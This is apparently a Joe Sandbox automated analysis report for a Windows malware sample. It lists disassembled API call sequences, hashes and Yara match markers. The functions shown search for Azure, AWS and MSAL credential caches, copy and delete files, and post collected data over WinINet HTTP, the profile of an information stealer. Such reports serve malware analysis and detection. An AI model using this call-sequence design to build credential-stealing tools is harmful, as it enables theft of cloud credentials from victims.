                                        • Part of subcall function 02309C27: LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                        • Part of subcall function 02309C27: CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                        • Part of subcall function 02319097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023190B9
                                      • strtok_s.MSVCRT ref: 02310582
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 023105C9
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023105D0
                                      • StrStrA.SHLWAPI(00000000,00421618), ref: 023105EC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023105FA
                                        • Part of subcall function 02318B47: malloc.MSVCRT ref: 02318B4F
                                        • Part of subcall function 02318B47: strncpy.MSVCRT ref: 02318B6A
                                      • StrStrA.SHLWAPI(00000000,00421620), ref: 02310636
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310644
                                      • StrStrA.SHLWAPI(00000000,00421628), ref: 02310680
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0231068E
                                      • StrStrA.SHLWAPI(00000000,00421630), ref: 023106CA
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023106DC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310769
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310781
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02310799
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023107B1
                                      • lstrcat.KERNEL32(?,0042164C), ref: 023107C9
                                      • lstrcat.KERNEL32(?,00421660), ref: 023107D8
                                      • lstrcat.KERNEL32(?,00421670), ref: 023107E7
                                      • lstrcat.KERNEL32(?,00000000), ref: 023107FA
                                      • lstrcat.KERNEL32(?,00421678), ref: 02310809
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231081C
                                      • lstrcat.KERNEL32(?,0042167C), ref: 0231082B
                                      • lstrcat.KERNEL32(?,00421680), ref: 0231083A
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231084D
                                      • lstrcat.KERNEL32(?,00421688), ref: 0231085C
                                      • lstrcat.KERNEL32(?,0042168C), ref: 0231086B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231087E
                                      • lstrcat.KERNEL32(?,00421698), ref: 0231088D
                                      • lstrcat.KERNEL32(?,0042169C), ref: 0231089C
                                      • strtok_s.MSVCRT ref: 023108E0
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023108F5
                                      • memset.MSVCRT ref: 02310944
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID:
                                      • API String ID: 3689735781-0
                                      • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction ID: fde01e4f780b8883a004abb755ad02428586499f7ad44e47f7f34902ba362aeb
                                      • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction Fuzzy Hash: 78D14D75A41208ABCB18FBF0DD95EEEB77AFF14302F508519E102A6090EF74AA45CF61
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 00405A13
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00882610,00000000,?,0087C388,00000000,?,00421A1C), ref: 00405E71
                                      • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                      • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                      • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                      • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                      • memcpy.MSVCRT(?), ref: 00405EFE
                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                      • HttpOpenRequestA.WININET(00000000,00882520,?,00881E28,00000000,00000000,00400100,00000000), ref: 00405BF8
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 1406981993-2180234286
                                      • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                      • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                      • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                      • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                      APIs
                                      • memset.MSVCRT ref: 00414D87
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • memset.MSVCRT ref: 00414E13
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      • memset.MSVCRT ref: 00414E9F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00882620,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                      • memset.MSVCRT ref: 00414F2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                      • API String ID: 4017274736-156832076
                                      • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                      • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                      • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                      • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                      • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                      • lstrcatA.KERNEL32(?,00000000,008786B0,00421474,008786B0,00421470,00000000), ref: 0040D208
                                      • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                      • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                      • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                      • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                      • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                      • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                      • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • lstrlenA.KERNEL32(?), ref: 0040D32A
                                      • lstrlenA.KERNEL32(?), ref: 0040D339
                                      • memset.MSVCRT ref: 0040D388
                                        • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 2775534915-0
                                      • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                      • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                      • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                      • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230D1EA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0230D32E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0230D335
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D46F
                                      • lstrcat.KERNEL32(?,00421478), ref: 0230D47E
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D491
                                      • lstrcat.KERNEL32(?,0042147C), ref: 0230D4A0
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D4B3
                                      • lstrcat.KERNEL32(?,00421480), ref: 0230D4C2
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D4D5
                                      • lstrcat.KERNEL32(?,00421484), ref: 0230D4E4
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D4F7
                                      • lstrcat.KERNEL32(?,00421488), ref: 0230D506
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D519
                                      • lstrcat.KERNEL32(?,0042148C), ref: 0230D528
                                      • lstrcat.KERNEL32(?,00000000), ref: 0230D53B
                                      • lstrcat.KERNEL32(?,00421490), ref: 0230D54A
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                      • lstrlen.KERNEL32(?), ref: 0230D591
                                      • lstrlen.KERNEL32(?), ref: 0230D5A0
                                      • memset.MSVCRT ref: 0230D5EF
                                        • Part of subcall function 0231ACD7: StrCmpCA.SHLWAPI(0064A350,0230AA0E,?,0230AA0E,0064A350), ref: 0231ACF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230D61B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 1973479514-0
                                      • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction ID: 22391ba68a53ce4a9fc81fc7d9a98aa4d62d8a3bf9c46a5871d20f3885a526d8
                                      • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction Fuzzy Hash: A1E15975951208ABCB28FBE0DD95EEE777ABF14302F504159E106A70A0EF34AB49CF61
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02305C5F
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 02305C7A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02305DFA
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 023060D8
                                      • lstrlen.KERNEL32(00000000), ref: 023060E9
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 023060FA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02306101
                                      • lstrlen.KERNEL32(00000000), ref: 02306116
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 0230612D
                                      • lstrlen.KERNEL32(00000000), ref: 0230613F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02306158
                                      • memcpy.MSVCRT(?), ref: 02306165
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 02306182
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02306196
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 023061B3
                                      • InternetCloseHandle.WININET(00000000), ref: 02306217
                                      • InternetCloseHandle.WININET(00000000), ref: 02306224
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02305E5F
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 0230622E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                      • String ID:
                                      • API String ID: 1703137719-0
                                      • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction ID: e59b1d0b5f9988f88b9d904212ade5fd9410f2252573cdc8e62973cbb4dd83b7
                                      • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction Fuzzy Hash: 7A12D575951218ABCB29EBA0DD94FEEB77ABF14701F504199E10AA3090EF706F89CF50
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00880AA0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                      • StrStrA.SHLWAPI(?,00880AD0,00420B52), ref: 0040CAF7
                                      • StrStrA.SHLWAPI(00000000,00880B18), ref: 0040CB1E
                                      • StrStrA.SHLWAPI(?,00881140,00000000,?,00421458,00000000,?,00000000,00000000,?,00878600,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                      • StrStrA.SHLWAPI(00000000,00880FC0), ref: 0040CCB9
                                        • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                        • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008786D0), ref: 0040C871
                                        • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                        • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • StrStrA.SHLWAPI(?,00880FC0,00000000,?,0042145C,00000000,?,00000000,008786D0), ref: 0040CD5A
                                      • StrStrA.SHLWAPI(00000000,008784C0), ref: 0040CD71
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                      • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                      • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                      • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                      • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0230CCD3
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0230CCF0
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0230CCFC
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0230CD0F
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0230CD1C
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0230CD40
                                      • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0230CD5E
                                      • StrStrA.SHLWAPI(00000000,0064A364), ref: 0230CD85
                                      • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0230CF09
                                      • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0230CF20
                                        • Part of subcall function 0230CA87: memset.MSVCRT ref: 0230CABA
